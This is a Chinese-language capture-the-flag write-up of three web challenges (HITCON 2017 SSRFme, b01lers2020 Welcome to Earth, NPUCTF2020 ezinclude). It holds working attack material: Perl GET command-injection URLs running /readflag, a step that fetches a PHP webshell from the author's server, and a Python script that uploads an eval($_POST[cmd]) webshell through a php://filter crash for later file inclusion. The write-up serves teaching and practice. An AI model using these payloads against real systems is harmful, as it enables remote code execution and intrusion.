[HITCON 2017]SSRFme

直接给了源代码，题目名称还是ssrf，那么该题大概率就是SSRF的漏洞，进行代码审计。

<?php// 检查是否存在 HTTP_X_FORWARDED_FOR 头，如果存在，则将其拆分为数组，并将第一个 IP 地址赋值给 REMOTE_ADDR。if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {$http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);$_SERVER['REMOTE_ADDR'] = $http_x_headers[0];}// 输出用户的远程地址（IP 地址）。echo $_SERVER["REMOTE_ADDR"];// 创建一个以用户 IP 地址（结合字符串 "orange"）生成的 MD5 哈希值命名的沙盒目录。$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);@mkdir($sandbox); // 创建沙盒目录，如果目录已存在，错误将被抑制。@chdir($sandbox); // 切换到沙盒目录中。// 使用 shell 命令 GET 获取由 URL 参数指定的资源。$data = shell_exec("GET " . escapeshellarg($_GET["url"]));// 解析文件路径信息，获取文件名和目录名等信息。$info = pathinfo($_GET["filename"]);// 去掉目录名中的点号，防止目录穿越漏洞。$dir  = str_replace(".", "", basename($info["dirname"]));@mkdir($dir); // 创建目录，如果目录已存在，错误将被抑制。@chdir($dir); // 切换到新创建的目录中。// 将获取到的数据写入指定的文件中。@file_put_contents(basename($info["basename"]), $data);// 高亮显示当前脚本文件的代码。highlight_file(__FILE__);

如果存在 HTTP_X_FORWARDED_FOR 头，则使用其第一个值，否则使用 REMOTE_ADDR。接着利用用户 IP 生成的 MD5 值来创建目录，确保每个用户的操作在不同的目录中进行。执行GET拼接shell命令，内容可控。将可控内容写入到可控文件中。

实现发送GET请求给当前GET参数’url‘，并将其结果保存在/sandbox/md5/filename中，其中filename为传入的Get参数。

构造?url=./../../&filename=123

然后访问，目录是 sandbox/(orange+ip)的MD5值/123

可以看到目录，但是不能够直接访问，尝试再多写一个../

 ?url=./../../../&filename=123

再加，最后为?url=./../../../../../&filename=123

已经可以看到根目录下的flag了。还可以看到readflag文件。那么思路就是利用readflag文件读取flag。

 尝试redaflag

?url=/readflag&filename=123

但是访问后是下载了一个二进制文件

并没有执行，那么就尝试将根目录下flag文件的内容写入到我们创建的文件中

利用到bash -c 

• bash: 这是指 Bash Shell，一种常用的命令行解释器。
• -c: 选项 -c 表示 Bash 将执行接下来的字符串作为命令。

/?url=file:bash -c /readflag|&filename=bash -c /readflag

file: 协议：通常用于访问文件系统中的文件。

再次传参/?url=file:bash -c /readflag&filename=123

然后访问

但是回显是空的。

 但是还可以使用另一种解法。

在vps上绑定一句话木马进行监听，然后通过GET命令去请求，用$_GET[“filename”]传入的值作为文件名保存。

python3 -m http.server

用python启用一个http服务。

 构造pyalod进行请求

?url=172.17.xx.xx:8000/shell.php&filename=shell.php

然后再去访问,这样就把我们的马子给写进去了。

蚁剑直接连接

但是flag不可以直接打开，需要执行readflag

总结，该题可以使用两种解法，一个是利用原来的readflag文件读取flag，并将读取的结果输入到我们创建的文件中；

第二种就是利用vps，直接把vps的木马挂到我们创建的文件中就可以getshell。

该题的考点是ssrf，GET命令的一个漏洞，GET命令是用perl来执行，而prel的open可以执行命令。

这里的GET不是我么平常的GET方法传参，这里的GET是Lib for WWW in Perl中的命令 目的是模拟http的GET请求,GET函数底层就是调用了open处理。

这里GET一个根目录，功能类似于ls把它给列出来。

[b01lers2020]Welcome to Earth

一个页面，但是是名为/die/

查看源代码

什么都没有，把/die/删掉看一看

 

可以看到源代码，访问 /chase/

接着访问/leftt/ 

接着访问/shoot/

接着访问/door/

接着访问/static/js/door.js

接着访问/open/

接着访问/static/js/open_sesame.js

最后访问/static/js/fight.js

得到源代码

// Run to scramble original flag
//console.log(scramble(flag, action));
function scramble(flag, key) {for (var i = 0; i < key.length; i++) {let n = key.charCodeAt(i) % flag.length;let temp = flag[i];flag[i] = flag[n];flag[n] = temp;}return flag;
}function check_action() {var action = document.getElementById("action").value;var flag = ["{hey", "_boy", "aaaa", "s_im", "ck!}", "_baa", "aaaa", "pctf"];// TODO: unscramble function
}

 flag被打乱了，还原flag。

# 从 itertools 库导入 permutations 函数，该函数可以生成给定可迭代对象的所有排列
from itertools import permutations# 定义一个包含若干字符串元素的列表 flag
flag = ["{hey", "_boy", "aaaa", "s_im", "ck!}", "_baa", "aaaa", "pctf"]# 使用 permutations 函数生成 flag 列表中所有元素的排列
item = permutations(flag)# 遍历所有排列的结果
for i in item:# 将当前排列 (元组) 转换为字符串k = ''.join(list(i))# 检查字符串是否以 "pctf{hey_boys" 开头，并且以 "}" 结尾if k.startswith('pctf{hey_boys') and k[-1] == '}':# 如果条件满足，则打印这个符合条件的字符串print(k)

尝试后得到pctf{hey_boys_im_baaaaaaaaaack!}

该题只有排列组合的问题，就算一个一个排列着试都可以得到正确结果。

[NPUCTF2020]ezinclude

显示username和password是错误的。尝试查看源代码。

有了提示，<!--md5($secret.$name)===$pass -->

在进过尝试后发现name和pass是通过get进行传参的。

 可以看到回显有个hash值，猜测可能是md5后的值，传参

/?name=1&pass=576322dd496b99d07b5b0f7fa7934a25

访问flflflflag.php

 

可以看到include($_GET["file"])

构造?file=php://filter/read=convert.base64-encode/resource=flflflflag.php

查看源代码

<html>
<head>
<script language="javascript" type="text/javascript">window.location.href="404.html";
</script>
<title>this_is_not_fl4g_and_åºé¢äºº_wants_girlfriend</title>
</head>
<>
<body>
<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){die('nonono');
}
@include($file);
echo 'include($_GET["file"])';
?>
</body>
</html>
w%ude($_GET["~)^"])

 再扫一下目录，看看还有没有其他可以用的代码。

扫了半天什么都没有扫到，但是看了wp后，存在一个dir.php文件

?file=php://filter/read=convert.base64-encode/resource=dir.php

<?php
var_dump(scandir('/tmp'));
?>

dir.php能打印临时文件夹里的内容.

那么我们就可以把码写到临时文件中。

利用php7 segment fault特性（CVE-2018-14884）

php代码中使用php://filter的 strip_tags 过滤器, 可以让 php 执行的时候直接出现 Segment Fault , 这样 php 的垃圾回收机制就不会在继续执行 , 导致 POST 的文件会保存在系统的缓存目录下不会被清除而不像phpinfo那样上传的文件很快就会被删除，这样的情况下我们只需要知道其文件名就可以包含我们的恶意代码。

strip_tags 过滤器的使用。

使用php://filter/string.strip_tags导致php崩溃清空堆栈重启，如果在同时上传了一个文件，那么这个tmp file就会一直留在tmp目录，知道文件名就可以getshell。这个崩溃原因是存在一处空指针引用。向PHP发送含有文件区块的数据包时，让PHP异常崩溃退出，POST的临时文件就会被保留，临时文件会被保存在upload_tmp_dir所指定的目录下，默认为tmp文件夹。

构造payloud

/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd

import requests  # 导入requests库，用于处理HTTP请求
from io import BytesIO  # 导入BytesIO，用于在内存中操作字节数据# 定义需要执行的PHP代码
payload = "<?php eval($_POST[cmd]);?>"  # 这是一个PHP代码片段，可以通过POST数据执行传入的命令# 准备要发送的数据，模拟一个文件上传
data = {'file': BytesIO(payload.encode())}  # 将payload字符串转换为字节并包装在BytesIO对象中，模拟文件上传# 定义目标服务器的URL
url = "http://ec4fa282-4f36-4ae3-9a08-56112f3a5155.node5.buuoj.cn:81/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
# 这个URL使用了PHP过滤器来访问目标服务器上的'/etc/passwd'文件内容# 发送POST请求，带上准备好的数据和文件上传
r = requests.post(url=url, files=data, allow_redirects=False)
# 发送POST请求，包含'files'数据，'allow_redirects=False'防止自动重定向

运行脚本后访问/dir.php

得到tmp目录下刚刚我们上传的文件路径:/tmp/phpqUFJz7

利用文件包含

flag在里面。

总结：php://filter的 strip_tags 过滤器在php7导致php崩溃清空堆栈重启，如果在同时上传了一个文件，那么这个tmp file就会一直留在tmp目录，知道文件名就可以getshell。